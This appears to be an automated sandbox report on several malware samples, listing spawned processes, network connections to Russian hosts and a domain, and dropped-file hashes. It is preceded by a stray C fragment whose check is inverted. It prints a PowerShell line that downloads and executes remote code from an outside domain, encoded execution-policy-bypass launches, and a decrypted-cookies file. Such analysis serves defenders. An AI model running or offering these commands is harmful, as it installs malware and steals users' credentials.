         c h a r   * l a r g e B u f f e r   =   V i r t u a l A l l o c ( N U L L ,   p a g e S i z e   *   N _ P A G E S _ T O _ A L L O C ,   M E M _ R E S E R V E   |   M E M _ C O M M I T   |   M E M _ L A R G E _ P A G E S ,   P A G E _ R E A D W R I T E ) ; 
         i f   ( l a r g e B u f f e r ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " V i r t u a l A l l o c   f a i l e d ,   e r r o r   0 x % x " ,   G e t L a s t E r r o r ( ) ) ; 
         } 
 } 

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss577F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi577C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr577D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr577E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc 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

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6BA5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6BA7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc 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

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7F51.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7F53.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc 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

C:\Windows\System32\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_wizard.zip\wizard.cpl",

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Temp1_wizard.zip\wizard.cpl",

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\New Compressed (zipped) Folder\86bb5e18da0ed3a8793cc3b38b57aa972a5d9ed0f07182712165f9703d81f27c.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffdb9109758,0x7ffdb9109768,0x7ffdb9109778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2912 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2904 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri "http://faststroygo.com:80/jsslatecqpa");

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\New Compressed (zipped) Folder\ff7953362998267e8554ee7880b215d42d460f12ff1cab773c9feb5c6225148b.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffdb9109758,0x7ffdb9109768,0x7ffdb9109778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4836 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1

C:\tepp\AutoIt3.exe

"C:\tepp\AutoIt3.exe" latecqpa.au3

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\dc5a8c20ddad9edf5bad9885ccc751301b09ff0477a50fc90f1ce0a9f8283635.jar"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe 6c2fd9890091213f759f6cfe01fb00531a5efc4bdbad60542cabd86c1aabd9f2.dll

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Compressed (zipped) Folder\Cookies_decrypted

Network

Country Destination Domain Proto
RU 62.173.141.118:445 tcp
US 8.8.8.8:53 118.141.173.62.in-addr.arpa udp
RU 62.173.141.116:445 tcp
RU 62.173.141.114:445 tcp
US 8.8.8.8:53 116.141.173.62.in-addr.arpa udp
US 8.8.8.8:53 114.141.173.62.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
RU 62.173.141.118:445 tcp
RU 62.173.141.116:445 tcp
RU 62.173.141.114:445 tcp
US 8.8.8.8:53 72.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 s3.us-east-1.amazonaws.com udp
US 52.216.137.246:443 s3.us-east-1.amazonaws.com tcp
US 8.8.8.8:53 246.137.216.52.in-addr.arpa udp
US 8.8.8.8:53 i.gyazo.com udp
US 104.18.24.163:443 i.gyazo.com tcp
US 104.18.24.163:443 i.gyazo.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 163.24.18.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 48.101.122.92.in-addr.arpa udp
US 8.8.8.8:53 crls.ssl.com udp
US 18.239.36.80:80 crls.ssl.com tcp
US 8.8.8.8:53 www.ssl.com udp
US 54.88.41.161:80 www.ssl.com tcp
US 8.8.8.8:53 165.184.237.34.in-addr.arpa udp
US 8.8.8.8:53 80.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 161.41.88.54.in-addr.arpa udp
US 8.8.8.8:53 faststroygo.com udp
RU 84.201.174.17:80 faststroygo.com tcp
RU 84.201.174.17:80 faststroygo.com tcp
US 8.8.8.8:53 17.174.201.84.in-addr.arpa udp
RU 84.201.174.17:80 faststroygo.com tcp
US 52.216.137.246:443 s3.us-east-1.amazonaws.com tcp
US 8.8.8.8:53 126.24.238.8.in-addr.arpa udp

Files

SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

memory/828-629-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/828-630-0x0000026A2F4D0000-0x0000026A2F4E0000-memory.dmp

memory/828-632-0x0000026A2F4D0000-0x0000026A2F4E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d03ed0080fc3decd88a5efd7e5f1a1e
SHA1 5f0c5035123108d7009d3f6bcc7111e3dbb6f537
SHA256 34f595aa5a7a4f60e89c7ef47ea15ba84a364f3628564611b4a967fbe42c7d38
SHA512 abd926ed79174af7086720fd054f1d7abe84e71aecc24eb603b0bf219b983c9ef8b0f47615a6ace64065574580fa707ced5134aedf33c965e67aac3cda0a8d93

C:\Users\Admin\AppData\Local\Temp\pss577F.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr577D.ps1

MD5 ee2199bb6dcffffec2a60eefbef7b969
SHA1 292d270b09b04000c8c6be8fc659178d936005e5
SHA256 2e18ad68d2cb41d3bcd1c0d1d6a417023bcf6b8fd798e308163dc498fc70f1ee
SHA512 bc70da13c576091e52f8d4fbec16c58482a886eb7c2004f25836b87438bdd4c334b73e13bd9bf53a781baced868487325394d4ba4ba81b0df16529ee1d787d0f

memory/5000-659-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/5000-661-0x000001FA6BB20000-0x000001FA6BB30000-memory.dmp

memory/5000-662-0x000001FA6BB20000-0x000001FA6BB30000-memory.dmp

memory/5000-695-0x000001FA6BB20000-0x000001FA6BB30000-memory.dmp

memory/5000-705-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6d79111bebb38571adee23cff9cb836
SHA1 e91bd98f439584eec1fcd7b4a5d7f3f9aad864bb
SHA256 346224c55c21d7e4e011e608e1a80b8c748833b69ec7273e075440cb00e02efc
SHA512 fc49c58eb2ba2e7599bf94bf09760a949b8951817657116b5d5701a688e80e7b79771fd8417ef03b73c06e3082823e3b76dff2d137dc9454a54e3bf2b4fc54dd

memory/828-736-0x0000026A2F4D0000-0x0000026A2F4E0000-memory.dmp

memory/828-737-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

\Windows\Installer\MSI68FD.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

C:\Windows\Installer\MSI68FD.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/3444-751-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/3444-752-0x000002399DFB0000-0x000002399DFC0000-memory.dmp

memory/3444-753-0x000002399DFB0000-0x000002399DFC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6d79111bebb38571adee23cff9cb836
SHA1 e91bd98f439584eec1fcd7b4a5d7f3f9aad864bb
SHA256 346224c55c21d7e4e011e608e1a80b8c748833b69ec7273e075440cb00e02efc
SHA512 fc49c58eb2ba2e7599bf94bf09760a949b8951817657116b5d5701a688e80e7b79771fd8417ef03b73c06e3082823e3b76dff2d137dc9454a54e3bf2b4fc54dd

C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1

MD5 bc163db1a8428962062548afaa6843c7
SHA1 88257fb1cbfebadde82923d6ec52fb9df7833a4c
SHA256 1d605afa29476fe635d26fcaf741dc0aee4aeb33c6d247630aa746b65cff77f6
SHA512 3ef0bef0d4f007d392f57751809eff9e9aa3e1b9afbd116a98a204d45d91bdb882a0ca5965f4c6b232815743f1f32a44d2c2e68437a10821ab339f288b8a2bd4

memory/3464-781-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/3464-783-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-782-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-802-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-803-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-812-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-835-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f85f1914b1c3bbef30f39bd08363f595
SHA1 04f9312f78bca050562d9a39e90ff5666dc1fa93
SHA256 81016116978995c668e9ce7a047d592a72f5946fc02728a6cd133dc2df92ab6f
SHA512 ae2d590df1f737967914a2d5e000069aeb9e97107def9e50a4bfe8d4566af236d60347762636ef2183c615d2212e27f860d3915452353f1b7cf15643051ef609

memory/3444-862-0x000002399DFB0000-0x000002399DFC0000-memory.dmp

memory/3444-867-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

C:\Windows\Installer\MSI7EF7.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

\Windows\Installer\MSI7EF7.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

memory/3732-880-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/3732-883-0x0000014F3DBB0000-0x0000014F3DBC0000-memory.dmp

memory/3732-882-0x0000014F3DBB0000-0x0000014F3DBC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f85f1914b1c3bbef30f39bd08363f595
SHA1 04f9312f78bca050562d9a39e90ff5666dc1fa93
SHA256 81016116978995c668e9ce7a047d592a72f5946fc02728a6cd133dc2df92ab6f
SHA512 ae2d590df1f737967914a2d5e000069aeb9e97107def9e50a4bfe8d4566af236d60347762636ef2183c615d2212e27f860d3915452353f1b7cf15643051ef609

C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1

MD5 7ab7f92ab2847dcb1f0b77d5e491b0c1
SHA1 10335ed88adf16a0730f9a000a31b065a62dab2d
SHA256 68bafb05f381355f9e20b24b492682969dbfb49aca96d214f497dc8a8ed9f7a7
SHA512 76849524f4e2a43305ca4c921fff3a4d0ca389f8fe17ef6ce273700cdd6c7e28854fbb9eb9ea0adb8082212c4477daa58a9d013c50ac3673900317709467fe4e

memory/460-910-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/460-911-0x000001CAF9A60000-0x000001CAF9A70000-memory.dmp

memory/460-913-0x000001CAF9A60000-0x000001CAF9A70000-memory.dmp

\??\pipe\crashpad_2100_NOHUQUKXWOMSAQCZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 78067c3cba08d378fd0c76bbb351fbf3
SHA1 3a5fd18bfc84fc0993cba765cd3ee45ee6d1c5d3
SHA256 12f5052360788fccf9f6e3dde50d6f593a7d2b84c2efd11bf34b95e3bdef6899
SHA512 95c8ecc257492f756299dd5aea3bdd7881b7a4f2e0cea239639e8870c7fe6706a9d6db9de07db7cbb8801b189e858502f0191d98108330d10b7fa370e9da3044

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 662820d0c1240d53a0f0a9f5446920c4
SHA1 342bc623537c132d216d72df6252b392e04d4d06
SHA256 901c2fcfd25eb1710dd215f2f685f70249d069910ea437c282073f4e65b7bf26
SHA512 018c6c2b30a2a900e475b377f684f86679c5e2c74f3835d4ab83ee91fca87b8e43ffcaa5496da8e914ad7f87c631d2520da60435f9aae0ce8f9b1a90149ae695

memory/4060-1083-0x00000000039B0000-0x0000000003B45000-memory.dmp

memory/4060-1084-0x00000000039B0000-0x0000000003B45000-memory.dmp

memory/4060-1085-0x00000000039B0000-0x0000000003B45000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e5370f97fe2fcddc5980ce258e23f4ab
SHA1 84b2cc6d4a23c8c8561228881b5c240b117cc72a
SHA256 f9d03e8c023e371089499b4b8600daffc070dd5a35d5e2cac692ac4b105c0358
SHA512 074b7ed63ed4a1c2b674842e1c8eaf3b258f8e4370d75b81d070235496ee3197c5d4d50c287146ef19fd3f0844e94a6018fb881bedfb53c63ee3a69edc681195

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 19131829b446578460ec4f0c373b61ff
SHA1 57fabf8435d946d577487f493922682d9e2e7903
SHA256 c1066bfe508c8e6b3368d9497213e83b47646593afac6aba1610d8ae9c2e6edd
SHA512 6518d4a8e94ec70554bb0af7d3db32bc0fe1567c6b2f60426819011a28ed616ab4c44138891f3a54fdc61fbf241a05d9744fee8af9b8e4189568afa11f26965f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a6af17ad87a6e824cfd644fc2829dc83
SHA1 e9dff8e98a2d8674cd6aaac18987eff7c9f4df83
SHA256 8c50baa52593a2b1635eb6278dec42c541c2e7ca5346623296db635990acdcda
SHA512 91a2575998ae83ed28969887d17d6e556418adb5f7866f557c3f556df5e60363dd872ba489f240d750e55a93ecd4077ffa4aa9ea37785d6725c8137f1d124e9c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b6af79cf3a3cc4fc33a28e171b3fc8fc
SHA1 f6bf51855cee7365ea954f5cbbbbeaaaa5f98d69
SHA256 046e40474e88cd704e411ec84ab07cbf444b1395882b01e559840e6a60c880d7
SHA512 d8697180a695b82e7b180b5b29cdb05549b2c6951b6126fe720e91efc5774a753b5dda096a9940d4f021cd242d6259cb2d521e049f7c9ae02cc4df0645a358fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 97c62f0e555d9d88ec5b1ec912dc4de1
SHA1 da77c7de7b9725ba50eecbedb55afe8f187d08d0
SHA256 300171088b059aa10e412e1a85479e6fe5a7f356537a070bbd6897f0c5fb428b
SHA512 b09407abbbe72d66f2468db2bfea511714ae5d90173c5d5cd3b999dac31223d1f922dc3778d3d9de53db3255b49532bb23c9468d77c06b0fe1d7879ae867e018

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 c187c41fb74b9d7aab6e200571c0a4a9
SHA1 76da5852e7b3a69d4d5f558a95ef634a6d514418
SHA256 abc0d8520123380bdb999af86290ccf384192a7a6b5afb5fc13983cea0a6bfc1
SHA512 2031614197ae0a2daf75e249174053698f32099d6e164fb972086628741e13604852dba0d241374320ea9cd087fa9280dce338818f0f51daa61c65f57ca7b7dc